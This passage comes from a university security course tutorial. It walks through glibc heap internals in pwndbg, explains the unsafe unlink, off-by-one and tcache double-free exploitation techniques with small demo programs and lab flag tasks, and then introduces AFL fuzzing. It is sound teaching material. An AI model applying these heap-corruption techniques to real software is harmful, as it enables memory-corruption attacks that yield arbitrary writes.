Note that in a single fastbin, all the freed chunks have the same size. (Q: but their allocation sizes may differ, why?)
The heap chunk with a size of 40 (0x28) belongs to the 3rd fastbin, while the head of the linked list is pointing to our 4th heap chunk and the 4th heap chunk points to the 2nd one. Pay attention to the order of these chunk in the linked list. In fact, the chunk is inserted at the HEAD of its corresponding fastbin.
40 (0x28)
We can use pwndbg to print out the memory detail of a heap chunk. We take the 2nd heap chunk as an example.
pwndbg> p *(mchunkptr) 0x804b058 $1 = { prev_size = 0, size = 41, fd = 0x804b018, bk = 0x0, fd_nextsize = 0x0, bk_nextsize = 0x0 }
We have explained what is prev_size and what is size above. (Why the prev_size is 0 here?). When a chunk is freed, the first 16 bytes of its data storage are no longer used to store user data. Instead, they are used to store pointers pointing forward and backward to the chunks in the same bin. Here fd stores the pointer pointing to the 1st heap chunk in the 3rd fastbin (i.e., size of 0x28). The bk pointer, however, is not used as the fastbin is a single linked list. You can also print out the detail of the 4th heap chunk.
prev_size
fd
bk
Continue the execution and we arrive at Stage 3. This time all the heap objects we have initially allocated are freed. In addition, we invoked another malloc(32) in this stage. Let's check the status of the fastbins again by using command fastbins.
malloc(32)
pwndbg> fastbins fastbins 0x10: 0x0 0x18: 0x804b040 -> 0x804b000 <- 0x0 0x20: 0x0 0x28: 0x804b018 <- 0x0 0x30: 0x0 0x38: 0x0 0x40: 0x0
With a smaller size, the 1st chunk and the 3rd chunk are placed into the 1st fastbin. Print out the memory details of these two heap chunks as above, and make sure that you understand each field value before continuing. Try to print out the list of all the heap chunks again by using command heap.
pwndbg> heap Free chunk (fastbins) | PREV_INUSE Addr: 0x804b000 Size: 0x19 fd: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b018 Size: 0x29 fd: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b040 Size: 0x19 fd: 0x804b000 Allocated chunk | PREV_INUSE Addr: 0x804b058 Size: 0x29 Top chunk | PREV_INUSE Addr: 0x804b080 Size: 0x20f81
Note that the sizes of the chunks indicate that they are still inuse (Q: Why? The inuse bit is 1!). The reason is that when a heap chunk is freed and stored into the fastbin, the LSB of the size field of its next chunk is not cleared.
You can see that the freed chunk at 0x804b058 is used to serve the allocation request. In other words, the fastbin works in a LIFO (Last-In-First-Out) style.
0x804b058
LIFO (Last-In-First-Out)
Let's allocate some heap chunks whose sizes are out of the fastbin range. Continue the execution and we now arrive at Stage 4. Another 5 heap objects with size of 100, 120, 140, 160, 180 are allocated by calling malloc(). Use command heap to print out the chunk list.
pwndbg> heap Free chunk (fastbins) | PREV_INUSE Addr: 0x804b000 Size: 0x19 fd: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b018 Size: 0x29 fd: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b040 Size: 0x19 fd: 0x804b000 Allocated chunk | PREV_INUSE Addr: 0x804b058 Size: 0x29 Allocated chunk | PREV_INUSE Addr: 0x804b080 Size: 0x69 Allocated chunk | PREV_INUSE Addr: 0x804b0e8 Size: 0x81 Allocated chunk | PREV_INUSE Addr: 0x804b168 Size: 0x91 Allocated chunk | PREV_INUSE Addr: 0x804b1f8 Size: 0xa9 Allocated chunk | PREV_INUSE Addr: 0x804b2a0 Size: 0xb9 Top chunk | PREV_INUSE Addr: 0x804b358 Size: 0x20ca9
We can see that the 5 new heap chunks are created on the heap one by one following the order of malloc() being called. (Q: Why we have these chunk sizes here?) Let's print out the 3rd new chunk as an example.
pwndbg> p *(mchunkptr) 0x804b168 $2 = { prev_size = 0, size = 145, fd = 0x0, bk = 0x0, fd_nextsize = 0x0, bk_nextsize = 0x0 }
Moving forward to Stage 5, the 2nd and the 4th (in term of those bigger chunks we allocate later) heap chunks are de-allocated. Try command heap to print out the chunk list.
pwndbg> heap Free chunk (fastbins) | PREV_INUSE Addr: 0x804b000 Size: 0x19 fd: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b018 Size: 0x29 fd: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b040 Size: 0x19 fd: 0x804b000 Allocated chunk | PREV_INUSE Addr: 0x804b058 Size: 0x29 Allocated chunk | PREV_INUSE Addr: 0x804b080 Size: 0x69 Free chunk (unsortedbin) | PREV_INUSE Addr: 0x804b0e8 Size: 0x81 fd: 0xf7fcf7b0 bk: 0x804b1f8 Allocated chunk Addr: 0x804b168 Size: 0x90 Free chunk (unsortedbin) | PREV_INUSE Addr: 0x804b1f8 Size: 0xa9 fd: 0x804b0e8 bk: 0xf7fcf7b0 Allocated chunk Addr: 0x804b2a0 Size: 0xb8 Top chunk | PREV_INUSE Addr: 0x804b358 Size: 0x20ca9
When these heap chunks are freed, they are in fact recycled into the unsorted bin. Unlike the fastbins, chunks inside this bin can have various sizes. And more importantly, the unsorted bin is a cyclic double linked list. Take a look at the above result, we can find that the 2nd chunk has a backward pointer pointing to the 4th chunk and the 4th chunk has a forward pointer pointing to the 2nd chunk. The head chunk of the unsorted bin is at 0xf7fcf7b0:
unsorted bin
0xf7fcf7b0
pwndbg> unsortedbin unsortedbin all: 0x804b1f8 -> 0x804b0e8 -> 0xf7fcf7b0 (main_arena+48) <- 0x804b1f8
Pay attention to the order of these two chunks in the bin.
We can print out the memory detail of the freed chunk for more information. Take the 2nd one at 0x804b0e8 as an example.
0x804b0e8
pwndbg> p *(mchunkptr) 0x804b0e8 $3 = { prev_size = 0, size = 129, fd = 0xf7fcf7b0 <main_arena+48>, bk = 0x804b1f8, fd_nextsize = 0x0, bk_nextsize = 0x0 }
Try to take a look at the 3rd chunk after the 2nd chunk at 0x804b168.
0x804b168
pwndbg> malloc_chunk -v 0x804b168 Allocated chunk Addr: 0x804b168 prev_size: 0x80 size: 0x90 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00
Why is the size 144(0x90) now? And why does the prev_size become 128(0x80)?
144(0x90)
128(0x80)
If you are good with everything so far, we can move forward to Stage 6. This time we allocate a new heap object with size 240. Let's print out the chunk list first,
pwndbg> heap -v Free chunk (fastbins) | PREV_INUSE Addr: 0x804b000 prev_size: 0x00 size: 0x19 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b018 prev_size: 0x00 size: 0x29 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b040 prev_size: 0x00 size: 0x19 fd: 0x804b000 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk | PREV_INUSE Addr: 0x804b058 prev_size: 0x00 size: 0x29 fd: 0x804b018 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk | PREV_INUSE Addr: 0x804b080 prev_size: 0x00 size: 0x69 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Free chunk (smallbins) | PREV_INUSE Addr: 0x804b0e8 prev_size: 0x00 size: 0x81 fd: 0xf7fcf828 bk: 0xf7fcf828 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk Addr: 0x804b168 prev_size: 0x80 size: 0x90 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Free chunk (smallbins) | PREV_INUSE Addr: 0x804b1f8 prev_size: 0x00 size: 0xa9 fd: 0xf7fcf850 bk: 0xf7fcf850 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk Addr: 0x804b2a0 prev_size: 0xa8 size: 0xb8 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk | PREV_INUSE Addr: 0x804b358 prev_size: 0x00 size: 0xf9 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Top chunk | PREV_INUSE Addr: 0x804b450 prev_size: 0x00 size: 0x20bb1 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00
As expected, a new heap chunk with chunk size 248(0xf8) is generated. However, it seems that the freed 2nd and 4th chunk are not in the unsorted bin any longer. One is linked into a new linked list with the head node at 0xf7fcf828, and the other one is linked into another linked list which has the head node at 0xf7fcf850. You can also print out the detail of these two chunks to get more information.
248(0xf8)
0xf7fcf828
0xf7fcf850
So what happened? In fact, when a new malloc request comes, the unsorted bin is traversed (fastbins are skipped due to size constraint) to find out a proper freed chunk. However, both the 2nd chunk and the 4th chunk cannot satisfy the request size. So they are unlinked from the unsorted bin, and then inserted into their corresponding smallbin. We can use command smallbins to check that.
smallbin
pwndbg> smallbins smallbins 0x80: 0x804b0e8 -> 0xf7fcf828 (main_arena+168) <- 0x804b0e8 0xa8: 0x804b1f8 -> 0xf7fcf850 (main_arena+208) <- 0x804b1f8
Note that different from the unsorted bin, the chunks in the same smallbin have the same size, but it is also a cyclic double linked list. (The number inside the parentheses is the chunk size).
Finally, we arrive at Stage 7. This time we de-allocate the 3rd chunk in between the freed 2nd and 4th chunk, and then list out all the heap chunks.
pwndbg> heap -v Free chunk (fastbins) | PREV_INUSE Addr: 0x804b000 prev_size: 0x00 size: 0x19 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b018 prev_size: 0x00 size: 0x29 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Free chunk (fastbins) | PREV_INUSE Addr: 0x804b040 prev_size: 0x00 size: 0x19 fd: 0x804b000 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk | PREV_INUSE Addr: 0x804b058 prev_size: 0x00 size: 0x29 fd: 0x804b018 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk | PREV_INUSE Addr: 0x804b080 prev_size: 0x00 size: 0x69 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Free chunk (unsortedbin) | PREV_INUSE Addr: 0x804b0e8 prev_size: 0x00 size: 0x1b9 fd: 0xf7fcf7b0 bk: 0xf7fcf7b0 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk Addr: 0x804b2a0 prev_size: 0x1b8 size: 0xb8 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Allocated chunk | PREV_INUSE Addr: 0x804b358 prev_size: 0x00 size: 0xf9 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00 Top chunk | PREV_INUSE Addr: 0x804b450 prev_size: 0x00 size: 0x20bb1 fd: 0x00 bk: 0x00 fd_nextsize: 0x00 bk_nextsize: 0x00
Surprisingly, you can see that those three freed chunks are consolidated into a new big chunk. It will used to serve for the allocation request in the future.
[Task] Exploit target with your payload and submit the flag! (hint: heap overflow)
Revisiting the struct malloc_chunk allocated by malloc():
struct malloc_chunk
When malloc() is called, ptr pointing at the start of the usable payload section is returned, while the previous bytes store metadata information. When the allocated chunk is freed by calling free(ptr), as we have experienced from the previous steps, the first 16 bytes of the payload section are used as fd and bk.
ptr
free(ptr)
A more detailed view of a freed chunk:
chunk-> +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | Size of previous chunk, if unallocated (P clear) | +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ `head:' | Size of chunk, in bytes |A|0|P| mem-> +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | Forward pointer to next chunk in list | +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | Back pointer to previous chunk in list | +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | Unused space (may be 0 bytes long) . . . . | nextchunk-> +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ `foot:' | Size of chunk, in bytes | +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | Size of next chunk, in bytes |A|0|0| +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+
[NOTE]: Free chunks are maintained in a circular doubly linked list by struct malloc_state.
struct malloc_state
Now let's take a look at some interesting heap management mechanisms we can abuse to exploit heap.
The main idea of this technique is to trick free() to unlink the second chunk (p2) from free list so that we can achieve arbitrary write.
p2
When free(p1) is called, _int_free(mstate av, mchunkptr p, int have_lock) is actually invoked and frees the first chunk. Several checks are applied during this process, which we will not go into details here, but you will be asked to bypass some of them in the lab challenges ;)
free(p1)
_int_free(mstate av, mchunkptr p, int have_lock)
The key step during the free(p1) operation is when the freed chunk is put back to unsorted bin (think of unsorted bin as a cache to speed up allocation and deallocation requests). The chunk will first be merged with neighboring free chunks in memory, called consolidation, then added to the unsorted bin as a larger free chunk for future allocations.
Three important phases:
Consolidate backward
If previous chunk in memory is not in use (PREV_INUSE (P) == 0), unlink is called on the previous chunk to take it off the free list. The previous chunk's size is then added to the current size, and the current chunk pointer points to the previous chunk.
PREV_INUSE (P) == 0
unlink
Consolidate forward (in the figure)
If next chunk (p2) in memory is not the top chunk and not in use, confirmed by next-to-next chunk’s PREV_INUSE (P) bit is unset (PREV_INUSE (P) == 0), unlink is called on the next chunk (p2) to take it off the free list. To navigate to next-to-next chunk, add both the current chunk's (p1) size and the next chunk's (p2) size to the current chunk pointer.
PREV_INUSE (P)
p1
Finally the consolidated chunk is added to the unsorted bin.
The interesting part comes from the unlink process:
#define unlink(P, BK, FD) { FD = P->fd; BK = P->bk; FD->bk = BK; BK->fd = FD; }
unlink is a macro defined to remove a victim chunk from a bin. Above is a simplified version of unlink. Essentially it is adjusting the fd and bk of neighboring chunks to take the victim chunk (p2) off the free list by P->fd->bk = P->bk and P->bk->fd = P->fd.
P->fd->bk = P->bk
P->bk->fd = P->fd
If we think carefully, the attacker can craft the fd and bk of the second chunk (p2) and achieve arbitrary write when it's unlinked. Here is how this can be performed.
Let's first break down the above unlink operation from the pure C language's point of view. Assuming 32-bit architecture, we get:
BK = *(P + 12); FD = *(P + 8); *(FD + 12) = BK; *(BK + 8) = FD;
Resulting in:
The memory at FD+12 is overwritten with BK.
FD+12
BK
The memory at BK+8 is overwritten with FD.
BK+8
FD
Q: What if we can control BK and FD?
Assume that we can overflow the first chunk (p1) freely into the second chunk (p2). In such case, we are free to put any value to BK and FD of the second chunk (p2).
We can achieve arbitrary writing of malicious_addr to target_addr by simply:
malicious_addr
target_addr
Changing FD of the second chunk (p2) to our target_addr-12
target_addr-12
Changing BK of the second chunk (p2) to our malicious_addr
Isn't it just amazing? :)
However, life is not easy. To achieve this, the second chunk (p2) has to be free, confirmed by the third chunk’s PREV_INUSE (P) bit is unset (PREV_INUSE (P) == 0). Recall that during unlink consolidation phase, we navigate to the next chunk by adding the current chunk's size to its chunk pointer. In malloc.c, it is checked in _int_free (mstate av, mchunkptr p, int have_lock):
malloc.c
_int_free (mstate av, mchunkptr p, int have_lock)
/* check/set/clear inuse bits in known places */ #define inuse_bit_at_offset(p, s) \ (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE) ... static void _int_free (mstate av, mchunkptr p, int have_lock) { nextsize = chunksize(nextchunk); ... if (nextchunk != av->top) { /* get and clear inuse bit */ nextinuse = inuse_bit_at_offset(nextchunk, nextsize); /* consolidate forward */ if (!nextinuse) { unlink(av, nextchunk, bck, fwd); size += nextsize; } else clear_inuse_bit_at_offset(nextchunk, 0); ... }
[TASK]: Can you trick free() to think the second chunk (p2) is free?
Here is how we can achieve it while overflowing the first chunk (p1):
Set size of nextchunk to -sizeof(void*) (-4 in 32-bit arch). Note that it also achieves PREV_INUSE (P) == 0 in this case.
nextchunk
-sizeof(void*)
-4
Set size of previous chunk to 0.
Therefore, inuse_bit_at_offset(p, s) will get the address of the third chunk by adding -4 bytes to the second chunk's (p2) address, which will return the second chunk (p2) itself. As we have crafted that PREV_INUSE (P) == 0, we can successfully bypass if (!nextinuse) and enter unlink!
inuse_bit_at_offset(p, s)
if (!nextinuse)
Off-by-one means that when data is written to a buffer, the number of bytes written exceeds the size of the buffer by only one byte. The most common case is that one extra NULL byte is written (e.g. recall strcpy from previous labs), which makes PREV_INUSE (P) == 0 so the previous block is considered a fake free chunk. You can now launch unsafe unlink attack introduced in the previous section.
/* extract inuse bit of previous chunk */ #define prev_inuse(p) ((p)->size & PREV_INUSE) ... static void _int_free (mstate av, mchunkptr p, int have_lock) { ... /* consolidate backward */ if (!prev_inuse(p)) { prevsize = p->prev_size; size += prevsize; p = chunk_at_offset(p, -((long) prevsize)); unlink(av, p, bck, fwd); } ... }
Here we can try to trigger backward consolidation. When free(p2), since the first chunk (p1) is "free" (PREV_INUSE (P) == 0), _int_free() will try to consolidate the first chunk (p1) backward and invoke unlink. We can therefore launch unlink attack by preparing malicious FD and BK in the first chunk (p1).
free(p2)
_int_free()
Now let's get our hand dirty and get a flag using another heap exploit technique called double-free. Specifically, we are going to talk about double-free in tcache.
A new heap caching mechanism called tcache (thread local caching) was introduced in glibc 2.26 back in 2017. Tcache offers significant performance gains by creating per-thread caches for chunks up to a certain size. Operations on tcache bins require no locking, hence the speed improvements. The malloc algorithms will first look into tcache bins before traversing fast, small, large or unsorted bins, whenever a chunk is allocated or freed.
A singly linked list is used to manage tcache bins as chunks in tcache are never removed from the middle of the list, but follow LIFO (last-in-first-out) order. Two particular structures are introduced: tcache_perthread_struct and tcache_entry.
tcache_perthread_struct
tcache_entry
malloc.c:
/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; /* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */ typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct;
There are 64 singly-linked bins per thread by default, for chunksizes from 24 to 1032 (12 to 516 on x86) bytes, in 16 (8) byte increments. A single tcache bin contains at most 7 chunks by default.
/* This is another arbitrary limit, which tunables can change. Each tcache bin will hold at most this number of chunks. */ # define TCACHE_FILL_COUNT 7
/* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */ # define TCACHE_MAX_BINS 64
Two functions are added to modern libc for tcache management: tcache_put and tcache_get.
tcache_put
tcache_get
/* Caller must ensure that we know tc_idx is valid and there's room for more chunks. */ static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); assert (tc_idx < TCACHE_MAX_BINS); e->next = tcache->entries[tc_idx]; tcache->entries[tc_idx] = e; ++(tcache->counts[tc_idx]); } /* Caller must ensure that we know tc_idx is valid and there's available chunks to remove. */ static __always_inline void * tcache_get (size_t tc_idx) { tcache_entry *e = tcache->entries[tc_idx]; assert (tc_idx < TCACHE_MAX_BINS); assert (tcache->entries[tc_idx] > 0); tcache->entries[tc_idx] = e->next; --(tcache->counts[tc_idx]); return (void *) e; }
When a chunk is freed, __int_free() is invoked and based on certain condition, tcache_put() will be called to put the chunk into tcache.
__int_free()
tcache_put()
#if USE_TCACHE { size_t tc_idx = csize2tidx (size); if (tcache && tc_idx < mp_.tcache_bins && tcache->counts[tc_idx] < mp_.tcache_count) { tcache_put (p, tc_idx); return; } } #endif
And when a chunk is requested, malloc algorithm will first check whether the chunk of the requested size is available in tcache bins. If yes, tcache_get() will be called to retrieve it.
tcache_get()
#if USE_TCACHE /* int_free also calls request2size, be careful to not pad twice. */ size_t tbytes; checked_request2size (bytes, tbytes); size_t tc_idx = csize2tidx (tbytes); MAYBE_INIT_TCACHE (); DIAG_PUSH_NEEDS_COMMENT; if (tc_idx < mp_.tcache_bins /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */ && tcache && tcache->entries[tc_idx] != NULL) { return tcache_get (tc_idx); } DIAG_POP_NEEDS_COMMENT; #endif
Let's take a look at tcache-example binary to get a better sense of how tcache actually works. This binary allocates in total 9 chunks, where 4 are of size 0x30, 2 are of 0x40, 2 are of 0x50 and 1 is 0x430. At the end of the program, all of the first 8 are freed. As we can imagine, the first 7 should be recycled to tcache bins and the 8th one will be recycled to unsorted bin due to it's large size.
tcache-example
Let's confirm it in pwndbg:
pwndbg> b * main + 296 Breakpoint 1 at 0x80485de: file tcache-example.c, line 32. pwndbg> r Starting program: /home/lab09/tut09-advheap/tcache-example ... Breakpoint * main + 296 pwndbg> bins tcachebins 0x20 [ 3]: 0x804b1c0 —▸ 0x804b190 —▸ 0x804b160 ◂— 0x0 0x28 [ 2]: 0x804b230 —▸ 0x804b1f0 ◂— 0x0 0x30 [ 2]: 0x804b2c0 —▸ 0x804b270 ◂— 0x0 fastbins 0x10: 0x0 0x18: 0x0 0x20: 0x0 0x28: 0x0 0x30: 0x0 0x38: 0x0 0x40: 0x0 unsortedbin all: 0x804b308 —▸ 0xf7fb17d8 (main_arena+56) ◂— 0x804b308 smallbins empty largebins empty
Now, let's talk about double-free.
A double-free vulnerability occurs when a variable is free()'d twice. The implications of a double-free are often memory leaks and arbitrary writes, but the possibilities are endless.
In an old libc (before tcache was added), when a chunk is freed, malloc algorithm checks whether that chunk is already at the top of the bin (already freed). If yes, an ERROR "double free or corruption (fa.ttop)" will be thrown, causing SIGABRT. However, such check is not conducted along the code path involving tcache, which makes double-free exploit even easier.
"double free or corruption (fa.ttop)"
SIGABRT
In new libc where tcache is introduced (>= 2.26):
#include <stdlib.h> #include <stdio.h> int main() { char *a = malloc(0x38); free(a); free(a); printf("%p\n", malloc(0x38)); printf("%p\n", malloc(0x38)); }
No surprise, we get the same pointer twice from the last two mallocs.
In old libc (< 2.26):
#include <stdlib.h> #include <stdio.h> int main() { printf("%s","hello\n"); char *a = malloc(0x38); char *b = malloc(0x38); free(a); free(b); free(a); printf("%p\n", malloc(0x38)); printf("%p\n", malloc(0x38)); printf("%p\n", malloc(0x38)); }
output:
hello 0x8943570 0x89435b0 0x8943570
The extra effort required to trigger double-free in old libc is exactly due to the integrity check introduced above.
So, what are the interesting things we can do using double-free vulnerability? As you can imagine, using double-free, we can assign the same memory location to two variables. Operations on those two variable can vary, depending on the program logic, yet they are affecting the same memory location! By carefully choosing the two controlling variables, we can achieve unintended behaviors, such as arbitrary write.
Now let's try to exploit the target program to spit out the flag for you! The target program is a simple notebook kept by an Admin. You can add, delete or edit a note. You can also call the Admin for privileged requests. Do you spot the design flaw? It will be a double-free vulnerability, of course ;)
[TASK]: In target, can you call the Admin back and bring you the flag?
Luckily in modern libc heap implementations various security checks are applied to detect and prevent such vulnerabilities. A curated list of applied security checks can be found here.
Our adventure ends here. In fact, a lot of interesting facts about the glibc heap implementation have not been covered but you have already gained enough basic knowledge to move forward. Check the references for further information.
Last but not least, the source of the glibc heap is always your best helper in this lab (it is available online at here). There is no magic or secret behind the heap!
In this tutorial, you will learn about fuzzing, an automated software testing technique for bug finding, and play with two of the most commonly-used and effective fuzzing tools, i.e., AFL and libFuzzer. You you learn the workflow of using these fuzzers, and explore their internals and design choices with a few simple examples.
wget https://tc.gts3.org/cs6265/tut/lab10.tar.gz tar xzvf lab10.tar.gz
We first have to instrument the program, allowing us to extract the coverage map efficiently in every fuzzing invocation.
$ cd tut10-01-fuzzing/tut1 $ afl-gcc ex1.cc afl-cc 2.52b by <lcamtuf@google.com> afl-as 2.52b by <lcamtuf@google.com> [+] Instrumented 9 locations (64-bit, non-hardened mode, ratio 100%). # meaning 9 basic blocks are instrumented
Instead of using gcc, you can simply invoke afl-gcc, a wrapper script that enables instrumentation seamlessly without breaking the building process. In a standard automake-like building environment, you can easily inject this compiler option via CC=afl-gcc or CC=afl-clang depending on the copmiler of your choice.
gcc
afl-gcc
CC=afl-gcc
CC=afl-clang
// ex1.cc int main(int argc, char *argv[]) { char data[100] = {0}; size_t size = read(0, data, 100); if (size > 0 && data[0] == 'H') if (size > 1 && data[1] == 'I') if (size > 2 && data[2] == '!') __builtin_trap(); return 0; }
$ ./a.out HI! Illegal instruction (core dumped)
Indeed, ./a.out behaves like a normal program if invoked: instrumented parts are not activated unless we invoke the program with afl-fuzz, a fuzzing driver. Let's first check how this binary is instrumented by AFL.
./a.out
$ nm a.out | grep afl_ 0000000000202018 b __afl_area_ptr 0000000000000e8e t __afl_die 0000000000202028 b __afl_fork_pid ... $ objdump -d a.out | grep afl_maybe_log 7fd: e8 7e 03 00 00 callq b80 <__afl_maybe_log> 871: e8 0a 03 00 00 callq b80 <__afl_maybe_log> 8b5: e8 c6 02 00 00 callq b80 <__afl_maybe_log> 8ed: e8 8e 02 00 00 callq b80 <__afl_maybe_log> ...
You would realize that __afl_maybe_log() is invoked in every basic blocks, in a total 9 times.
__afl_maybe_log()
Each basic block is uniquely identified with a random number as below:
7e8: 48 89 14 24 mov %rdx,(%rsp) 7ec: 48 89 4c 24 08 mov %rcx,0x8(%rsp) 7f1: 48 89 44 24 10 mov %rax,0x10(%rsp) *7f6: 48 c7 c1 33 76 00 00 mov $0x7633,%rcx 7fd: e8 7e 03 00 00 callq b80 <__afl_maybe_log>
The fuzzer's goal is to find one of crashing inputs, "HI!...", that reaches the __builtin_trap() instruction. Let's see how AFL generates such an input, quite magically! To do so, we need to provide an initial input corpus, on which the fuzzer attempts to mutate based. Let's start the fuzzing with "AAAA" as input, expecting that AFL successfully converts the input to crash the program.
"HI!..."
__builtin_trap()
"AAAA"
$ mkdir input output $ echo AAAA > input/test $ afl-fuzz -i input -o output ./a.out (after a few seconds, press Ctrl-c to terminate the fuzzer) ... american fuzzy lop 2.52b (a.out) +- process timing -------------------------------------+- overall results -----+ | run time : 0 days, 0 hrs, 0 min, 30 sec | cycles done : 100 | | last new path : 0 days, 0 hrs, 0 min, 29 sec | total paths : 4 | | last uniq crash : 0 days, 0 hrs, 0 min, 29 sec | uniq crashes : 1 | | last uniq hang : none seen yet | uniq hangs : 0 | +- cycle progress --------------------+- map coverage -+-----------------------+ | now processing : 2 (50.00%) | map density : 0.01% / 0.02% | | paths timed out : 0 (0.00%) | count coverage : 1.00 bits/tuple | +- stage progress --------------------+- findings in depth --------------------+ | now trying : havoc | favored paths : 4 (100.00%) | | stage execs : 237/256 (92.58%) | new edges on : 4 (100.00%) | | total execs : 121k | total crashes : 6 (1 unique) | | exec speed : 3985/sec | total tmouts : 0 (0 unique) | +- fuzzing strategy yields -----------+---------------+- path geometry --------+ | bit flips : 1/104, 1/100, 0/92 | levels : 3 | | byte flips : 0/13, 0/9, 0/3 | pending : 0 | | arithmetics : 1/728, 0/0, 0/0 | pend fav : 0 | | known ints : 0/70, 0/252, 0/132 | own finds : 3 | | dictionary : 0/0, 0/0, 0/0 | imported : n/a | | havoc : 1/120k, 0/0 | stability : 100.00% | | trim : 20.00%/1, 0.00% +------------------------+ +-----------------------------------------------------+ [cpu000: 10%]
There are a few interesting information in AFL's GUI:
+-----------------------+ | cycles done : 100 | | total paths : 4 | | uniq crashes : 1 | | uniq hangs : 0 | +-----------------------+
cycles done
total paths
unique crashes/hangs
+- map coverage -+-----------------------+ | map density : 0.01% / 0.02% | | count coverage : 1.00 bits/tuple | +- findings in depth --------------------+
map density
count coverage
+- stage progress --------------------+ | now trying : havoc | | stage execs : 237/256 (92.58%) | | total execs : 121k | | exec speed : 3985/sec | +- fuzzing strategy yields -----------+
This describes the progress of the current stage: e.g., which fuzzing strategy is applied and how much this stage is completed.
(from document) - havoc - a sort-of-fixed-length cycle with stacked random tweaks. The operations attempted during this stage include bit flips, overwrites with random and "interesting" integers, block deletion, block duplication, plus assorted dictionary-related operations (if a dictionary is supplied in the first place).
+- fuzzing strategy yields ---------------------------+ | bit flips : 1/104, 1/100, 0/92 | | byte flips : 0/13, 0/9, 0/3 | | arithmetics : 1/728, 0/0, 0/0 | | known ints : 0/70, 0/252, 0/132 | | dictionary : 0/0, 0/0, 0/0 | | havoc : 1/120k, 0/0 | | trim : 20.00%/1, 0.00% | +-----------------------------------------------------+
It summarizes how each strategies yield a new path: e.g., bit flips, havoc and arithmetics found new paths, helping us to determine which strategies work for our fuzzing target.
Using AFL, we can reveal non-trivial security bugs without having a deep understanding of the target program. Today's target is a toy program called "registration" that is carefully implemented to contain a bug for education purpose.
Can you spot any bugs in "registration.c" via code auditing? Indeed, it's not too easy to find one, so let's try to use AFL.
$ CC=afl-gcc make $ ./registration ...
Let's manually explore this toy program while collecting what we are typing as input.
$ tee input/test1 | ./registration (your input...) $ tee input/test2 | ./registration (your input...)
$ afl-fuzz -i input -o output ./registration
In fact, the fuzzer fairly quickly finds a few crashing inputs! You can easily analyze them by manually injecting the crashing input to the program or by running it with gdb.
$ ls output/crashes id:000001,sig:06,src:000001,op:flip2,pos:18 ...
Let's pick one of the crashing inputs, and reproduce the crash like this:
